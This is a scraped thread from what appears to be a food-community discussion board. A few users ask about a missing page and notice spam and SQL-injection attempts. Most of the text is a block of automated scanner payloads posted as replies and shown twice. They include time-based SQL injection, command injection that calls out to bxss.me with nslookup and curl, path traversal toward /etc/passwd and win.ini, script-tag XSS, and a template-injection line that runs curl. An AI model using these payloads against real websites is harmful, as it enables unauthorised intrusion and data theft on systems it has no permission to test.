It was such an incredible source of informations. I can not find it anywhere on the site. Is there a plan to put it back online?
Sorry, i'm just commenting to send this to the top for those that sort by latest reply
re: Lynch91
response.write(9024448*9061344)
'+response.write(9024448*9061344)+'
"+response.write(9024448*9061344)+"
<esi:include src="http://bxss.me/rpb.png"/>
${9999144+9999108}
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
../
redirtest.acx
)
!(()&&!|*|*|
^(#$!@#$)(()))******
ctimesleepp0(I30tp1Rp2.
'"()
'&&sleep(27*1000)*fizair&&'
'.gethostbyname(lc('hitbu'.'zfnezgdq0e2e3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(67).chr(108).chr(74).'
"&&sleep(27*1000)*detwzl&&"
".gethostbyname(lc("hitkb"."smhtjvdk38b0d.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(77).chr(120).chr(65)."
'||sleep(27*1000)*lnbmte||'
gethostbyname(lc('hitrr'.'ayxiqqdb24393.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(69).chr(99).chr(76)
"||sleep(27*1000)*ebynem||"
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
/etc/shells
../../../../../../../../../../../../../../etc/shells
HttP://bxss.me/t/xss.html?%00
c:/windows/win.ini
bxss.me/t/xss.html?%00
bxss.me
Http://bxss.me/t/fit.txt
echo ymbsez$()\ awsgad\nz^xyu||a #' &echo ymbsez$()\ awsgad\nz^xyu||a #|" &echo ymbsez$()\ awsgad\nz^xyu||a #
http://bxss.me/t/fit.txt?.jpg
index.php
&echo slcdbv$()\ tdxmfx\nz^xyu||a #' &echo slcdbv$()\ tdxmfx\nz^xyu||a #|" &echo slcdbv$()\ tdxmfx\nz^xyu||a #
index.php�
"+"A".concat(70-3).concat(22*4).concat(111).concat(76).concat(113).concat(66)+(require"socket"Socket.gethostbyname("hitms"+"cjfihtyp11021.bxss.me.")[3].to_s)+"
|echo onxyvd$()\ dhtmme\nz^xyu||a #' |echo onxyvd$()\ dhtmme\nz^xyu||a #|" |echo onxyvd$()\ dhtmme\nz^xyu||a #
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
'+'A'.concat(70-3).concat(22*4).concat(117).concat(67).concat(101).concat(69)+(require'socket'Socket.gethostbyname('hitsl'+'lvbowiaz9cf65.bxss.me.')[3].to_s)+'
index.php/.
expr 9000366172 - 971614
';print(md5(31337));$a='
'A'.concat(70-3).concat(22*4).concat(122).concat(81).concat(98).concat(80)+(require'socket'Socket.gethostbyname('hitql'+'xhdhsxvtcaf08.bxss.me.')[3].to_s)
(nslookup -q=cname hitdcnibflayvdae99.bxss.me||curl hitdcnibflayvdae99.bxss.me))
";print(md5(31337));$a="
$(nslookup -q=cname hitepadgrosut6dbd2.bxss.me||curl hitepadgrosut6dbd2.bxss.me)
${@print(md5(31337))}
'"
&nslookup -q=cname hitwqwvbebsplc3054.bxss.me&'\"`0&nslookup -q=cname hitwqwvbebsplc3054.bxss.me&`'
${@print(md5(31337))}\
<!--
&(nslookup -q=cname hitshvcbulxdlca5c8.bxss.me||curl hitshvcbulxdlca5c8.bxss.me)&'\"`0&(nslookup -q=cname hitshvcbulxdlca5c8.bxss.me||curl hitshvcbulxdlca5c8.bxss.me)&`'
'.print(md5(31337)).'
|(nslookup -q=cname hitfgikbofydr4fe04.bxss.me||curl hitfgikbofydr4fe04.bxss.me)
`(nslookup -q=cname hitlcktpdrocf63116.bxss.me||curl hitlcktpdrocf63116.bxss.me)`
;(nslookup -q=cname hitrsizpdrjza68d74.bxss.me||curl hitrsizpdrjza68d74.bxss.me)|(nslookup -q=cname hitrsizpdrjza68d74.bxss.me||curl hitrsizpdrjza68d74.bxss.me)&(nslookup -q=cname hitrsizpdrjza68d74.bxss.me||curl hitrsizpdrjza68d74.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitmzvculvhoc7ee7d.bxss.me||curl${IFS}hitmzvculvhoc7ee7d.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitbruxkzbwyu0df81.bxss.me||curl${IFS}hitbruxkzbwyu0df81.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitbruxkzbwyu0df81.bxss.me||curl${IFS}hitbruxkzbwyu0df81.bxss.me)&`'
'"()&%<zzz><ScRiPt >r50B(9138)</ScRiPt>
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitblmiaczniafbbbb.bxss.me")}}
'"()&%<zzz><ScRiPt >r50B(9544)</ScRiPt>
9700575
lTyRrbto
*1
-1 OR 5*5=25 --
-1 OR 5*5=26 --
-1 OR 5*5=25
-1 OR 5*5=26
*if(now()=sysdate(),sleep(15),0)
0'XOR(*if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1 waitfor delay '0:0:15' --
BqkpnixX'; waitfor delay '0:0:15' --
-1 OR 177=(SELECT 177 FROM PG_SLEEP(15))--
-1) OR 895=(SELECT 895 FROM PG_SLEEP(15))--
-1)) OR 380=(SELECT 380 FROM PG_SLEEP(15))--
rstNiaZU' OR 92=(SELECT 92 FROM PG_SLEEP(15))--
6hyixitY') OR 571=(SELECT 571 FROM PG_SLEEP(15))--
7g3t5RI0')) OR 543=(SELECT 543 FROM PG_SLEEP(15))--
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
'||(select 1 from (select pg_sleep(15))x)||'
''||(select 1 from (select pg_sleep(15))x)||''
@@Y8Fa2
(select 198766*667891)
(select 198766*667891 from DUAL)
I was wondering where it went as well.
I saw that it has been spam so likely Saito-san is cleaning it up right now
Yeah the spam was pretty bad. Looks like some SQL injection was being attempted, based on the spam's contents.
What kind of jerk would attach a foodie discussion board?
In other news, the language selection for the community section is broken. i select "English" as the language (and it displays locale=en) but all the date stamps are in Japanese.
Just weird that the hacker is doing SQL injection on the comments section. People usually do it on the login page.
Do you still receive Q&A?
尚未註冊帳號者 註冊新帳號
忘記密碼
已註冊帳號者 登入
By signing up, I agree to the Terms of Service and Privacy Policy
8 Comments
Sorry, i'm just commenting to send this to the top for those that sort by latest reply
re: Lynch91
response.write(9024448*9061344)
re: Lynch91
'+response.write(9024448*9061344)+'
re: Lynch91
"+response.write(9024448*9061344)+"
re: Lynch91
<esi:include src="http://bxss.me/rpb.png"/>
re: Lynch91
${9999144+9999108}
re: Lynch91
../../../../../../../../../../../../../../etc/passwd
re: Lynch91
../../../../../../../../../../../../../../windows/win.ini
re: Lynch91
file:///etc/passwd
re: Lynch91
../
re: Lynch91
redirtest.acx
re: Lynch91
)
re: Lynch91
!(()&&!|*|*|
re: Lynch91
^(#$!@#$)(()))******
re: Lynch91
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Lynch91
'"()
re: Lynch91
'&&sleep(27*1000)*fizair&&'
re: Lynch91
'.gethostbyname(lc('hitbu'.'zfnezgdq0e2e3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(67).chr(108).chr(74).'
re: Lynch91
"&&sleep(27*1000)*detwzl&&"
re: Lynch91
".gethostbyname(lc("hitkb"."smhtjvdk38b0d.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(77).chr(120).chr(65)."
re: Lynch91
'||sleep(27*1000)*lnbmte||'
re: Lynch91
gethostbyname(lc('hitrr'.'ayxiqqdb24393.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(69).chr(99).chr(76)
re: Lynch91
"||sleep(27*1000)*ebynem||"
re: Lynch91
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Lynch91
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Lynch91
/etc/shells
re: Lynch91
../../../../../../../../../../../../../../etc/shells
re: Lynch91
HttP://bxss.me/t/xss.html?%00
re: Lynch91
c:/windows/win.ini
re: Lynch91
bxss.me/t/xss.html?%00
re: Lynch91
bxss.me
re: Lynch91
Http://bxss.me/t/fit.txt
re: Lynch91
echo ymbsez$()\ awsgad\nz^xyu||a #' &echo ymbsez$()\ awsgad\nz^xyu||a #|" &echo ymbsez$()\ awsgad\nz^xyu||a #
re: Lynch91
http://bxss.me/t/fit.txt?.jpg
re: Lynch91
index.php
re: Lynch91
&echo slcdbv$()\ tdxmfx\nz^xyu||a #' &echo slcdbv$()\ tdxmfx\nz^xyu||a #|" &echo slcdbv$()\ tdxmfx\nz^xyu||a #
re: Lynch91
index.php�
re: Lynch91
"+"A".concat(70-3).concat(22*4).concat(111).concat(76).concat(113).concat(66)+(require"socket"
Socket.gethostbyname("hitms"+"cjfihtyp11021.bxss.me.")[3].to_s)+"
re: Lynch91
|echo onxyvd$()\ dhtmme\nz^xyu||a #' |echo onxyvd$()\ dhtmme\nz^xyu||a #|" |echo onxyvd$()\ dhtmme\nz^xyu||a #
re: Lynch91
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Lynch91
'+'A'.concat(70-3).concat(22*4).concat(117).concat(67).concat(101).concat(69)+(require'socket'
Socket.gethostbyname('hitsl'+'lvbowiaz9cf65.bxss.me.')[3].to_s)+'
re: Lynch91
index.php/.
re: Lynch91
expr 9000366172 - 971614
re: Lynch91
';print(md5(31337));$a='
re: Lynch91
'A'.concat(70-3).concat(22*4).concat(122).concat(81).concat(98).concat(80)+(require'socket'
Socket.gethostbyname('hitql'+'xhdhsxvtcaf08.bxss.me.')[3].to_s)
re: Lynch91
(nslookup -q=cname hitdcnibflayvdae99.bxss.me||curl hitdcnibflayvdae99.bxss.me))
re: Lynch91
";print(md5(31337));$a="
re: Lynch91
$(nslookup -q=cname hitepadgrosut6dbd2.bxss.me||curl hitepadgrosut6dbd2.bxss.me)
re: Lynch91
${@print(md5(31337))}
re: Lynch91
'"
re: Lynch91
&nslookup -q=cname hitwqwvbebsplc3054.bxss.me&'\"`0&nslookup -q=cname hitwqwvbebsplc3054.bxss.me&`'
re: Lynch91
${@print(md5(31337))}\
re: Lynch91
<!--
re: Lynch91
&(nslookup -q=cname hitshvcbulxdlca5c8.bxss.me||curl hitshvcbulxdlca5c8.bxss.me)&'\"`0&(nslookup -q=cname hitshvcbulxdlca5c8.bxss.me||curl hitshvcbulxdlca5c8.bxss.me)&`'
re: Lynch91
'.print(md5(31337)).'
re: Lynch91
|(nslookup -q=cname hitfgikbofydr4fe04.bxss.me||curl hitfgikbofydr4fe04.bxss.me)
re: Lynch91
`(nslookup -q=cname hitlcktpdrocf63116.bxss.me||curl hitlcktpdrocf63116.bxss.me)`
re: Lynch91
;(nslookup -q=cname hitrsizpdrjza68d74.bxss.me||curl hitrsizpdrjza68d74.bxss.me)|(nslookup -q=cname hitrsizpdrjza68d74.bxss.me||curl hitrsizpdrjza68d74.bxss.me)&(nslookup -q=cname hitrsizpdrjza68d74.bxss.me||curl hitrsizpdrjza68d74.bxss.me)
re: Lynch91
|(nslookup${IFS}-q${IFS}cname${IFS}hitmzvculvhoc7ee7d.bxss.me||curl${IFS}hitmzvculvhoc7ee7d.bxss.me)
re: Lynch91
&(nslookup${IFS}-q${IFS}cname${IFS}hitbruxkzbwyu0df81.bxss.me||curl${IFS}hitbruxkzbwyu0df81.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitbruxkzbwyu0df81.bxss.me||curl${IFS}hitbruxkzbwyu0df81.bxss.me)&`'
re: Lynch91
'"()&%<zzz><ScRiPt >r50B(9138)</ScRiPt>
re: Lynch91
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitblmiaczniafbbbb.bxss.me")}}
re: Lynch91
'"()&%<zzz><ScRiPt >r50B(9544)</ScRiPt>
re: Lynch91
9700575
re: Lynch91
lTyRrbto
re: Lynch91
*1
re: Lynch91
*1
re: Lynch91
*1
re: Lynch91
*1
re: Lynch91
-1 OR 5*5=25 --
re: Lynch91
-1 OR 5*5=26 --
re: Lynch91
-1 OR 5*5=25
re: Lynch91
-1 OR 5*5=26
re: Lynch91
*if(now()=sysdate(),sleep(15),0)
re: Lynch91
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Lynch91
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Lynch91
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Lynch91
-1; waitfor delay '0:0:15' --
re: Lynch91
-1); waitfor delay '0:0:15' --
re: Lynch91
-1 waitfor delay '0:0:15' --
re: Lynch91
BqkpnixX'; waitfor delay '0:0:15' --
re: Lynch91
-1 OR 177=(SELECT 177 FROM PG_SLEEP(15))--
re: Lynch91
-1) OR 895=(SELECT 895 FROM PG_SLEEP(15))--
re: Lynch91
-1)) OR 380=(SELECT 380 FROM PG_SLEEP(15))--
re: Lynch91
rstNiaZU' OR 92=(SELECT 92 FROM PG_SLEEP(15))--
re: Lynch91
6hyixitY') OR 571=(SELECT 571 FROM PG_SLEEP(15))--
re: Lynch91
7g3t5RI0')) OR 543=(SELECT 543 FROM PG_SLEEP(15))--
re: Lynch91
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Lynch91
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Lynch91
'||(select 1 from (select pg_sleep(15))x)||'
re: Lynch91
''||(select 1 from (select pg_sleep(15))x)||''
re: Lynch91
'"
re: Lynch91
@@Y8Fa2
re: Lynch91
(select 198766*667891)
re: Lynch91
(select 198766*667891 from DUAL)
I was wondering where it went as well.
I saw that it has been spam so likely Saito-san is cleaning it up right now
Yeah the spam was pretty bad. Looks like some SQL injection was being attempted, based on the spam's contents.
What kind of jerk would attach a foodie discussion board?
In other news, the language selection for the community section is broken. i select "English" as the language (and it displays locale=en) but all the date stamps are in Japanese.
Just weird that the hacker is doing SQL injection on the comments section. People usually do it on the login page.
Do you still receive Q&A?